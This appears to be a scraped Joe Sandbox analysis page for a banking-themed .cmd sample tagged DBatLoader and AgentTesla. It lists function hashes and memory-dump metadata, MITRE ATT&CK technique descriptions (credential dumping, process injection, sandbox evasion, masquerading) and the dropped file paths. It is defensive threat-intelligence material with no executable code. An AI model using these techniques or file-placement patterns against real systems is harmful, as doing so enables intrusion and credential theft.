Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID: PH]q
API String ID: 0-3168235125
Opcode ID: a67b5a2abdd335154f81c9c408a828f5fb40c17259539bf789d468a15daf185b
Instruction ID: db9672104cb6e1a2789cf7b75390b4566a626c80e5fe029f568767e8fe02b00c
Opcode Fuzzy Hash: a67b5a2abdd335154f81c9c408a828f5fb40c17259539bf789d468a15daf185b
Instruction Fuzzy Hash: A8411035B002059FCB68AB74D9546AE7BA6EF89360F10843CE406EB368DF34DE46C790

Function 061C1B40 Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

nKuq, xrefs: 061C1BC8

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID: nKuq
API String ID: 0-4080595220
Opcode ID: dcbc3858186b0f950a649cfa048e033d18aaca803b4fb50afbee93d602f2924b
Instruction ID: f9d034871db02fa613a8c911a108b0a22e1e2a0e3d33db894b2017ea4d120495
Opcode Fuzzy Hash: dcbc3858186b0f950a649cfa048e033d18aaca803b4fb50afbee93d602f2924b
Instruction Fuzzy Hash: 8C31F634F00215AFDF649BA8D9417BFBBBAEB88720F10842AF505E3395CB7489418BD5

Function 061C1530 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5a1b2700ba9fdbcaae1c96ff28a50a38d72b71ad2a53a01faf5e7a12ba00ef5
Instruction ID: 8e183424b7c20aa4dbff2905d9b9d625a8ef3cd1c9c2f24c4c6d48201f12edd4
Opcode Fuzzy Hash: f5a1b2700ba9fdbcaae1c96ff28a50a38d72b71ad2a53a01faf5e7a12ba00ef5
Instruction Fuzzy Hash: B7B1C235E10258AFDF60CFA4C841BAEBBB2FB55320F10496AE50ADB291CB34DD45CB91

Function 061C0D58 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6251b8149479b464514719ba1a7d5c3628373db60912a89acc2a5fb7588f0d7a
Instruction ID: b2d153d146f1539c6b585e6a435c9c09c39e6107fd8b902bb51edcfc4620c75f
Opcode Fuzzy Hash: 6251b8149479b464514719ba1a7d5c3628373db60912a89acc2a5fb7588f0d7a
Instruction Fuzzy Hash: 66A1E931E04205CFDB60CF69C980BAEBBA5EF99331F14896AE419DB295D732EC41C791

Function 061D46D8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3351f10857ea59b005d7fca8845c2a74e9507128e1a75fe927683af61f62544
Instruction ID: 6c1d329e9b99f5b15860fce3c72747601a410094d6ef5127a399113ded1dc675
Opcode Fuzzy Hash: d3351f10857ea59b005d7fca8845c2a74e9507128e1a75fe927683af61f62544
Instruction Fuzzy Hash: 47914D30E002198FDF64DFA8C990B9DB7B1FF89300F208599D549BB295DB70AA85CF91

Function 061C1850 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e035e79a37f3dec2d7c556c735b6614e3aed2b377f89b3452c83dee2b430b15
Instruction ID: d95c1f049e7b5d73a690788cc2855cd3c1aafc56d61dec80f9a5b2b2f51ff70c
Opcode Fuzzy Hash: 6e035e79a37f3dec2d7c556c735b6614e3aed2b377f89b3452c83dee2b430b15
Instruction Fuzzy Hash: E3518D71D002149FCB60DFA9C881B9EBBB5FF99320F14856EE909EB251D734D905CB91

Function 061C2B6D Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246ab409619ae7ec8829b8e919664aa2d043fd6192323adf90f249581ce6884e
Instruction ID: d78c7eb86aeb476da62fe9ade2efe39710c0a02820c57d135bdfbc4ef8086d00
Opcode Fuzzy Hash: 246ab409619ae7ec8829b8e919664aa2d043fd6192323adf90f249581ce6884e
Instruction Fuzzy Hash: 05518074B002059FCB55EF64D8909BEB7F7EFE8310B108A29E806A7358DB75A9468B41

Function 061C2780 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc972455f87d6909b57afdabec51758db49070a7fed35f94edc81fa258b88323
Instruction ID: dd2291b501e002643087dbe94567e5eaada3fc2bd9ab7ae5bd1bf3207cdc7143
Opcode Fuzzy Hash: cc972455f87d6909b57afdabec51758db49070a7fed35f94edc81fa258b88323
Instruction Fuzzy Hash: 5851C034A002199FDB14DFA0D984AAEBBF2FF94750F24C529E805AB355DB70DD82CB81

Function 061C2790 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6653bc7919a6ee1186a3cc3e41a8f66427a71010e83a8ade8cfd55fa1faca304
Instruction ID: 637d99a20f11663476c7d96321367f9b14d6df03cba2daa52e500743fd6e2267
Opcode Fuzzy Hash: 6653bc7919a6ee1186a3cc3e41a8f66427a71010e83a8ade8cfd55fa1faca304
Instruction Fuzzy Hash: F951AE30A002198FDB14DFA4C594BAEBBF2BF94710F20C529E805AB355DB74ED82CB81

Function 061C09F0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27b4e2ba2573b184da732e3b0fe5dab4593d97513276f2326ed3c6ff0f566642
Instruction ID: e6a318be6735445f15202a4f653917b7c030f196de67ee65c1c09731c37e7407
Opcode Fuzzy Hash: 27b4e2ba2573b184da732e3b0fe5dab4593d97513276f2326ed3c6ff0f566642
Instruction Fuzzy Hash: 171129367082945FCB469FB85C1556F3FB7AFD9250B0544AAF905CB392DE348D0283AA

Function 061C109A Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d2b70d61133793edd95cbfea35430cfa7cd8e99c7f77ce129270df47df088af
Instruction ID: 78158f25be17eb2353029b0cebc294b1416d97bbabf2500d4f3a0719ca45a485
Opcode Fuzzy Hash: 9d2b70d61133793edd95cbfea35430cfa7cd8e99c7f77ce129270df47df088af
Instruction Fuzzy Hash: 6B31F5B5C01259AFCB50CF99D485ADEBBF4FF58320F14805AE808AB256D3749A45CBA4

Function 061D6E10 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b3ecde26b2e6f4850faacaba1e920fbe696820d86a6c7576a7afb74d467f17d
Instruction ID: 853273a09d5a406edb7d215c1f68c61e5f77c3491d6048e16f3493547e1db597
Opcode Fuzzy Hash: 4b3ecde26b2e6f4850faacaba1e920fbe696820d86a6c7576a7afb74d467f17d
Instruction Fuzzy Hash: 8621B431F100199FDF44DB69E9606ADB7B7EB84314F148525E409E7354DB30ED458BC1

Function 061C10A4 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69bbf2825145ca88dce5c21155151916bcec73b7fa8984ea255aacf88c05434a
Instruction ID: 98e7e3a38a57474c26553c338bdb143074310dafa34086ba40bac8461de69ca9
Opcode Fuzzy Hash: 69bbf2825145ca88dce5c21155151916bcec73b7fa8984ea255aacf88c05434a
Instruction Fuzzy Hash: B321F5B1C01259AFCB50CF99D585BDEFBF4EF58320F24805AE808AB255D3749A45CBA4

Function 061C0670 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 381d5728abf350bdd337ad7aef958384f7afa98ac2a1dce7b757262e39efc200
Instruction ID: 87d690f0e77dc586bed6d16eb01387a3fadd5c4a80998bbf420b3c540f2b2338
Opcode Fuzzy Hash: 381d5728abf350bdd337ad7aef958384f7afa98ac2a1dce7b757262e39efc200
Instruction Fuzzy Hash: 0A112672800249DFDB10DF9AC945BEEBFF4EF48320F14845AE918A7210C379A554DFA5

Function 061DF2C1 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad8fcf93a57f11a304aa6931e79bb9d2ff9739898e71d095b4ac88e8c3025bad
Instruction ID: 889ba12b0947655dbedcc0c5cbb6279380a4935957391dccc029892408d2352f
Opcode Fuzzy Hash: ad8fcf93a57f11a304aa6931e79bb9d2ff9739898e71d095b4ac88e8c3025bad
Instruction Fuzzy Hash: 9801F135B001001FDB26CABCD850B2E77D6DFCA315B20892AE50BCB290DF24DE078786

Function 061C0C98 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e29c4573e11c0cc0f9aeb6924b5e1aef15a08be74ec1f34a6a15dc6c7dc06e69
Instruction ID: fd813002ae42dd43ae75605a73dcf056e85c910646794a4fa93528902e666726
Opcode Fuzzy Hash: e29c4573e11c0cc0f9aeb6924b5e1aef15a08be74ec1f34a6a15dc6c7dc06e69
Instruction Fuzzy Hash: D51126B6800249DFDB10CF99D945BEEBBF4EB48320F14881AE928A7250C379A554DFA4

Function 061DF2D0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447051503.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61d0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd20b92d364c082853e56a928a9551dce07d2c9c347bc60d79862a9d5610ddf4
Instruction ID: 1c36ecf501b18ec0a0713caa82ce2249a79fae5d11582c0848c32e3295e57180
Opcode Fuzzy Hash: bd20b92d364c082853e56a928a9551dce07d2c9c347bc60d79862a9d5610ddf4
Instruction Fuzzy Hash: 7E016D36B101111FDB659AADA454B2E67DADBC9624F108429E50BC7350DE25DE038386

Function 061C01D7 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0c5eb2fbe8afa0f0f7c46c60858c7696974f9b3cad9a1f61f4be35988016734
Instruction ID: aaee14d87d2e91946e191223327e7e13e062ae4f1f1a8a318f236130eced6f60
Opcode Fuzzy Hash: e0c5eb2fbe8afa0f0f7c46c60858c7696974f9b3cad9a1f61f4be35988016734
Instruction Fuzzy Hash: 87F06935B001198FDB00CBA8D854BEEB7B1FF88322F1485A5E519A7294C7359911CBA0

Function 061C0A60 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d157daeed439e8ad31aee265cb6e38007ceebf5db3f1cac83d8b2725f81c9a17
Instruction ID: f6f1e7187bfd133633e277c3d20d05abafa9c20a7d3fea599a76abd1a7676927
Opcode Fuzzy Hash: d157daeed439e8ad31aee265cb6e38007ceebf5db3f1cac83d8b2725f81c9a17
Instruction Fuzzy Hash: F7F05E367002196B9B059E99AC449AF7FAFEFC8260B00442AFE0983250DE72991197A9

Function 061C0270 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce349953371fe87b52fea85632880a87a3e41b6a4e450e23d3487c9a4fb46cd9
Instruction ID: e8ba643cdfd516412a9a6bcacc04b37dfaba09bdb601a4659e52ac5a07637e7a
Opcode Fuzzy Hash: ce349953371fe87b52fea85632880a87a3e41b6a4e450e23d3487c9a4fb46cd9
Instruction Fuzzy Hash: DDF08C75D11205EF8B50DEF8AD015EF7FF8AB18262B10442AF809E2100E73082408BD0

Function 061C0280 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3446b876d99cc75faa8f3ab29574d453707ba13209588075b2d62eb8adad56
Instruction ID: 866eb40d7a1783047b7716629e89cb8d9247822600e5c6c9b9b1341727d3d4aa
Opcode Fuzzy Hash: 4f3446b876d99cc75faa8f3ab29574d453707ba13209588075b2d62eb8adad56
Instruction Fuzzy Hash: 38E04871D1021ADFCB50DEB99D151AF7BF8EB58251F014475D849D7240F731C60087D1

Function 061C2D6B Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2447009154.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_61c0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90e5e58f1ab952f8f3d81f5e6fed2b75608e5808bde345c5248ca05889812363
Instruction ID: 5f3bff975133304be88d23df4aeec7295fdf579907ecf7ff34f4afd486be726c
Opcode Fuzzy Hash: 90e5e58f1ab952f8f3d81f5e6fed2b75608e5808bde345c5248ca05889812363
Instruction Fuzzy Hash: 97E0C236F100216B5F18B694A5A05BD63E3EBED374310456AEA01C7389DB319A0647C4

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Threatname: Agenttesla

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Users\Public\Libraries\PNO

C:\Users\Public\Libraries\Wisrysxl

C:\Users\Public\Libraries\Wisrysxl.PIF

C:\Users\Public\Libraries\lxsyrsiW.cmd

C:\Users\Public\Libraries\lxsyrsiW.pif

C:\Users\Public\Wisrysxl.url

C:\Users\Public\alpha.pif

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAIbot.exe.log

Windows Analysis Report
Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
